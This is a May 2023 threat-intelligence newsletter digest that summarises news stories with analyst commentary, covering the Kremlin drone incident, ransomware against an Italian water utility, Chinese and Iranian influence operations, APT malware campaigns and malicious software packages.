Daily Drop (479): Kremlin drone ‘attack’ Staged, Iranian turn to IO, China 'coercing' Canadian congressman, Italian water supplier attacked, Operation SpecTor, Chinese disinfo network
05-04-2023
Thursday, May 04, 2023 // (IG): BB // Cloak & Dagger// Coffee for Bob
Russia says it will respond to Kremlin drone ‘attack’; Ukraine says drone incident was staged
Analyst Comments: The allegations made against Russia for staging the drone attack on the Kremlin are serious and, if proven to be true, could significantly escalate tensions between Russia and Ukraine. The allegations also underscore the ongoing tensions between the two nations and the complex dynamics of their relationship. The alleged attack and the subsequent response from Russia also highlight the danger of misinformation and propaganda, which could further fuel the ongoing conflict.
FROM THE MEDIA: Russia has been accused of staging a drone attack on the Kremlin and blaming it on Ukraine. Analysts from the Institute for the Study of War believe that Russia staged the attack to bring the war home to its domestic audience and set conditions for a wider societal mobilization. Meanwhile, Ukraine denied any involvement in the incident, stating that it likely signals that Russia is planning a large-scale terrorist attack against Ukraine in the coming days. Ukraine has also been hit by more drone strikes overnight with Russian forces launching Iranian-made drones aimed at Kyiv and Odesa. Russia's ambassador to the US has said that Russia will respond to the alleged drone attack on the Kremlin when it considers it necessary.
READ THE STORY: CNBC
TSMC and pals dream of €10B German chip fab
Analyst Comments: The news that TSMC is discussing plans for a new semiconductor plant in Europe comes as demand for semiconductors has surged amid pandemic-driven disruptions and supply chain vulnerabilities. This move is expected to ease the current global shortage of chips, as well as help the European Union reduce its dependence on foreign chip imports. TSMC is already expanding production in the US, but its efforts to build a new plant in Europe will be significant as it will mark its first major investment in the region.
FROM THE MEDIA: Taiwan Semiconductor Manufacturing Co. (TSMC) is in talks with Bosch, Infineon, and NXP Semiconductors, as well as the German government, to build a new $11 billion (€10 billion) semiconductor plant in Saxony, Germany. According to unnamed sources, the Taiwanese chipmaker has been pursuing the creation of a European plant for years, but its precise location and purpose have yet to be determined. Bloomberg reports that TSMC initially intended to construct a €7 billion facility for the manufacture of semiconductors for the automotive sector, but it is now expected to focus on mature 28-nanometer parts.
READ THE STORY: The Register
Iranian hackers turn to influence operations to amplify cyberattacks
Analyst Comments: The report highlights how Iran is adopting a strategy that Russia has been using in Ukraine by blending cyberattacks with influence operations to achieve political goals. This approach allows Iran to achieve its political objectives by amplifying the effects of conventional cyberattacks. It is a worrying trend that could have significant consequences for countries targeted by Iran, particularly those in the Middle East.
FROM THE MEDIA: Iranian state-backed hackers are using influence operations to increase the impact of their conventional cyberattacks and promote their political agenda, according to a report by Microsoft. These operations typically target Israel, the US, and those who oppose the Iranian regime. Microsoft identified 24 influence operations linked to the Iranian government and military in 2021, a significant increase from the seven operations detected in 2020. The operations require fewer resources and less time than traditional ransomware and wiper attacks and, when combined with conventional cyberattacks, can have a longer-lasting effect. The majority of the attacks are carried out by the Emennet Pasargad threat actor. Iranian state-sponsored hackers are using these attacks to target opposition movements within the country.
READ THE STORY: The Record
China says claims of officials 'coercing' Canadian congressman, relatives are false
Analyst Comments: The denial of China's Toronto consulate-general is in response to Canadian Prime Minister Justin Trudeau's allegations of Chinese interference. Canada has previously been the target of cyber-attacks, while two of its citizens are being detained in China. The incident adds to the already tense relations between China and Canada. Furthermore, it underscores China's consistent denial of allegations of interference and coercion, which has been a recurring theme in China's international relations. It remains to be seen how Canada will respond to China's denial of the accusations.
FROM THE MEDIA: China's Toronto consulate-general denied reports of consular officers "coercing" a Canadian lawmaker and his family. In a statement, the consulate called the report "baseless" and urged media and politicians to "stop spreading rumors and smearing". The statement added that Canadian media and politicians were damaging the consulate's reputation and image, and maliciously interfering with normal communication and cooperation between both parties. The statement comes after Canadian Prime Minister Justin Trudeau accused the country's spy agency of withholding information about Chinese threats against Conservative MP Michael Chong and his family in 2021.
READ THE STORY: Reuters
Italian water supplier serving 500,000 people hit with a ransomware attack
Analyst Comments: The ransomware attack on an Italian water supplier highlights the continued threat faced by critical infrastructure providers. As seen in this case, cybercriminals are increasingly targeting essential services such as drinking water, electricity, and gas supplies, and the stakes are high for affected communities. The incident emphasizes the urgent need for critical infrastructure providers to invest in cybersecurity measures to protect against such attacks.
FROM THE MEDIA: Alto Calore Servizi SpA, an Italian company that provides drinking water to nearly half a million people, has experienced technical disruptions following a ransomware attack. The attack has rendered all of their IT systems unusable, with the Medusa ransomware group taking credit for the attack and demanding a ransom. The company did not respond to requests for comment about whether customers were impacted by the incident. The distribution of water, however, appears not to have been affected by the attack. The company manages 58 million cubic meters of water a year and runs the collection, supply, and distribution of drinking water for 125 municipalities in southern Italy. Italy’s public service organizations have faced off against ransomware gangs several times in the last year, including the tax agency and the Italian energy agency that runs the country’s electricity market.
READ THE STORY: The Record
New Report Explores Solutions for Tech Risks in Financial System
Analyst Comments: The report by the World Economic Forum and Deloitte highlights the need for industry leaders, regulators, and consumers to be aware of emerging tech-driven risks and take appropriate action to mitigate them. As the financial system becomes more dependent on technology, new risks are surfacing as a result, and it’s essential to apply solutions throughout the financial services ecosystem to ensure resilience and stability in the coming years. The report provides a useful analysis of the emerging risks in the financial system and mitigation strategies that can be adopted by financial services executives, policy-makers, and regulators.
FROM THE MEDIA: The World Economic Forum (WEF) in collaboration with Deloitte has published a report titled "Pushing Through Undercurrents" that explores how technology-driven risks in financial services sectors can become systemic threats to the global financial system. The report examines how different forces influence the way tech-driven risks spread and offers approaches that financial services executives, policy-makers, regulators, and others can use to mitigate these risks. The risks include everything from social media enabling the manipulation of stock markets to increased risks from a rise in “buy now pay later” debt, and more. The report also explores managing geopolitical risks, such as the financial system’s vulnerability to state-sponsored cyberattacks, as a top priority for the financial system.
READ THE STORY: Modern Diplomacy
Canada's spy agency withheld information about China's threats to lawmaker
Analyst Comments: The revelation that Canadian intelligence failed to inform a lawmaker about Chinese threats against him and his family adds to concerns about Chinese interference in Canadian politics. Canadian officials have previously accused China of trying to meddle in the country's elections, and these latest allegations will only add to tensions between the two countries. The fact that Chong had to learn about the threats from a newspaper and not from the CSIS is likely to raise questions about the agency's handling of the matter and the government's ability to manage the machinery of government. It remains to be seen what further fallout, if any, will occur as a result of this revelation.
FROM THE MEDIA: Canadian Prime Minister Justin Trudeau said that the Canadian Security Intelligence Service (CSIS) failed to inform Michael Chong, a member of parliament with Canada's opposition Conservative party, about Chinese threats against him and his family in 2021. Chong had learned about the threats from a newspaper, not from the CSIS. Trudeau stated that he had told the agency that such threats must be revealed immediately in the future. The Globe and Mail newspaper reported the threats on Monday, citing a CSIS report. Several Canadian media outlets have reported on anonymous intelligence sources alleging schemes run by the Chinese government to interfere in Canada's last two elections. Beijing has denied those allegations. Trudeau has appointed an independent special investigator to probe the allegations.
READ THE STORY: Saltwire
Operation SpecTor: $53.4 Million Seized, 288 Vendors Arrested in Dark Web Drug Bust
Analyst Comments: The international law enforcement effort against dark web drug dealers is a significant development in the fight against drug trafficking and other illicit activities on the internet. The arrests and confiscations of cash, virtual currencies, drugs, and firearms will disrupt the operations of drug dealers and other criminals on the dark web. The success of Operation SpecTor highlights the importance of international cooperation among law enforcement agencies to combat transnational crime. The operation also underscores the limitations of anonymity and privacy on the dark web, as law enforcement agencies can use advanced technologies and techniques to track down criminals operating on the platform.
FROM THE MEDIA: Operation SpecTor, an international law enforcement effort, has resulted in the arrest of 288 vendors suspected of drug trafficking on the dark web. The operation also led to the confiscation of $53.4 million in cash and virtual currencies, 850 kg of drugs, and 117 firearms. Most of the arrests were made in the United States, followed by the United Kingdom, Germany, and the Netherlands. Operation SpecTor was launched after German authorities shut down the Monopoly marketplace in December 2021. The police action against Monopoly Market led to the arrest of 288 vendors and buyers across Europe, the United States, and Brazil. The vendors were active on other illicit marketplaces, which further impeded the trade of drugs and other illicit goods on the dark web. Europol, which coordinated the operation, stated that some of the apprehended individuals were considered high-value targets.
READ THE STORY: THN
Give NotPetya-hit Merck that $1.4B, appeals court tells insurers
Analyst Comments: The New Jersey court's ruling is a significant win for Merck and sets a precedent that will make it more challenging for insurers to use the act-of-war clause as a catch-all for government-linked cyberattacks. The decision is likely to affect the language used in underwriting policies and force insurers to rethink their approach to cyber risk. The ruling also highlights the need for insurance policies to adjust accordingly, particularly as the virtual and kinetic worlds become more interconnected.
FROM THE MEDIA: A court in New Jersey has ruled that insurers for pharmaceutical giant Merck cannot use an "act of war" clause in their insurance policies to deny the company's $1.4 billion payout to clean up its NotPetya infection. The court ruled that the attack against Merck was not specifically linked to Russian military action, and the war exclusion clause did not apply. Industry watchers say the ruling will make it more difficult for insurance companies to use war as an excuse not to pay losses related to cyberattacks. The decision may also affect the language used in underwriting policies, particularly with regard to risks such as ransomware and cyber warfare.
READ THE STORY: The Register
Chinese Hacker Group Earth Longzhi Resurfaces with Advanced Malware Tactics
Analyst Comments: The resurfacing of Earth Longzhi with a new campaign against targets in the Southeast Asian region is consistent with the group's previous attacks. The use of vulnerable public-facing applications to infiltrate targets has been a common tactic used by advanced threat actors. The group's use of BYOVD attacks and its exploitation of zamguard.sys to disable security products installed on hosts are also known tactics used by Chinese state-sponsored hackers.
FROM THE MEDIA: A Chinese state-sponsored hacking group, Earth Longzhi, which is a subgroup within APT41, has launched a new cyber-espionage campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji. The attack chain uses a vulnerable public-facing application as an entry point to deploy the BEHINDER web shell, allowing the group to drop additional payloads, including a new variant of a Cobalt Strike loader called CroxLoader. The hackers used a Windows Defender executable to perform DLL sideloading and exploited a vulnerable driver to disable security products installed on the hosts via a bring your own vulnerable driver (BYOVD) attack. Additionally, the malware also employs a second method called "stack rumbling," which causes targeted applications to crash upon launch.
READ THE STORY: THN
Meta: Chinese disinformation network was behind London front company recruiting content creators
Analyst Comments: The discovery of this Chinese disinformation network highlights the increasing prevalence of state-backed disinformation campaigns aimed at manipulating public opinion and disrupting democratic processes. The use of a front company in London to recruit content creators and translators underscores the sophistication and global reach of these operations. The involvement of Chinese state-affiliated entities in such activities is particularly concerning and underscores the need for greater regulation of social media platforms to counter the spread of disinformation.
FROM THE MEDIA: Meta has removed over 100 accounts on Facebook and dozens on Instagram belonging to a Chinese disinformation network that used a front company in London to recruit content creators and translators around the world. The network created fake personas impersonating companies and institutions in the US and EU, producing posts mimicking the entity before publishing negative commentary about Uyghur activists and critics of the Chinese state. The operation was used to target almost all major social media platforms, including Facebook and Instagram. While the actual operators of this network attempted to conceal their identities, Meta said its investigation had "found links to individuals in China associated with Xi'an Tainwendian Network Technology, an information technology company."
READ THE STORY: The Record
The unknown Indian company shipping millions of barrels of Russian oil
Analyst Comments: The rapid growth of Gatik Ship Management has raised concerns about its ownership and the nature of its relationship with Rosneft. The lack of transparency in the shipping industry has made it easier for companies to operate in secrecy, and this has led to concerns that some companies may be facilitating activities that are illegal or that pose a risk to national security. Given the close relationship between Rosneft and the Russian government, there is a risk that Gatik may be unwittingly involved in activities that are against India's interests. While the exact nature of Gatik's relationship with Rosneft is unknown, the Indian government should conduct an investigation to ensure that the country's security interests are not being compromised.
FROM THE MEDIA: Gatik Ship Management, an Indian shipping company, has grown into one of the largest oil tanker owners in the world, having acquired 56 vessels worth an estimated combined value of $1.6bn in just 18 months. However, Gatik's origins and ownership are shrouded in mystery, with corporate records being scant, and it not appearing in India's official corporate registry. While there are suspicions of a link between Gatik's biggest client, Rosneft, and Gatik's rapid expansion, it is unclear who owns Buena Vista Shipping, which shares an address with Gatik. The majority of Gatik's newly acquired fleet has been used to transport oil from Russia, mainly to ports in India, with tanker tracking data showing that Gatik has shipped at least 83mn barrels of Russian crude and oil products, with more than half coming from Rosneft. The exact nature of the relationship between Gatik and Rosneft is unclear, but the two companies appear to have a close relationship.
READ THE STORY: FT
Storing the Quran on your phone makes you a terror suspect in China
Analyst Comments: The Chinese government has been targeting its minority Muslim population in Xinjiang for years, implementing a massive surveillance and detention program that has drawn global condemnation. While China has argued that this campaign targets violent extremism and separatism, critics say it amounts to cultural genocide. The revelation that simply having religious materials on a mobile device is enough to flag someone as a potential terrorist risk adds weight to concerns about the extreme and invasive surveillance measures used in Xinjiang. The findings from HRW are likely to lead to further condemnation of China’s policies towards its Muslim population.
FROM THE MEDIA: The Chinese province of Xinjiang has conducted more than 11 million searches of residents’ devices to check for the presence of 50,000 items considered indicators of dissent or terror. Among them is the Quran, the central text of Islam, according to The Intercept. Advocacy group Human Rights Watch has released an analysis of the leaked list of material, which it said was used by the Xinjiang police, and found that half of the flagged items appear to be common Islamic religious materials. HRW said that any individual in Xinjiang with the documents on their devices can be deemed a terrorist risk.
READ THE STORY: The Register
WinRAR Weaponized for Attacks on Ukrainian Public Sector
Analyst Comments: The identification of RoarBat highlights the continued use of destructive malware by Russian threat actors, and it underscores the danger that such attacks pose to Ukraine and potentially other targets in the future. The likely involvement of Sandworm, a known Russian intelligence agency, in this incident, adds to the existing concerns about Russian cyber-espionage and the threat it poses to global cybersecurity.
FROM THE MEDIA: Ukrainian cybersecurity defenders have identified a malicious script called RoarBat, used to delete files in a state agency, which they believe was planted by the Russian intelligence agency known as Sandworm. The attackers likely gained access through a compromised VPN credential. Indicators point to Sandworm, with similarities to a January attack on Ukrinform. CyberArmyofRussia_Reborn was the group that published information about the Ukrinform attack, but Ukrainian defenders believe that Sandworm was responsible. The Russian hacking objective has shifted toward energy infrastructure in Ukraine.
READ THE STORY: Bank InfoSec
Anatomy of a Malicious Package Attack
Analyst Comments: The article provides a good overview of the threat posed by malicious packages and the basic techniques used by attackers to create and distribute them. The increasing threat of malicious package attacks adds further urgency to the growing need for a new approach to application security programs. The article also provides practical advice to companies to start prioritizing their software supply chain and to use automated scanning tools to monitor open-source code repositories and libraries for vulnerabilities and attacks.
FROM THE MEDIA: Malicious packages are software created with malicious intent that can wreak havoc inside users' systems. They are remarkably easy to create, and they are proliferating at an alarming pace. Attackers use four basic attack vectors for malicious packages, including brandjacking, typosquatting, dependency hijacking, and dependency confusion. Attackers using malicious packages tend to rely on four common techniques, including re- and post-install scripts, basic evasion techniques, shell commands, and basic network communication techniques. Malicious packages are an urgent threat to software and systems, and companies must use automated scanning tools that can monitor open-source code repositories and libraries for vulnerabilities and attacks.
READ THE STORY: DARKReading
Keep reading with a 7-day free trial
Subscribe to Bob’s Newsletter to keep reading this post and get 7 days of free access to the full post archives.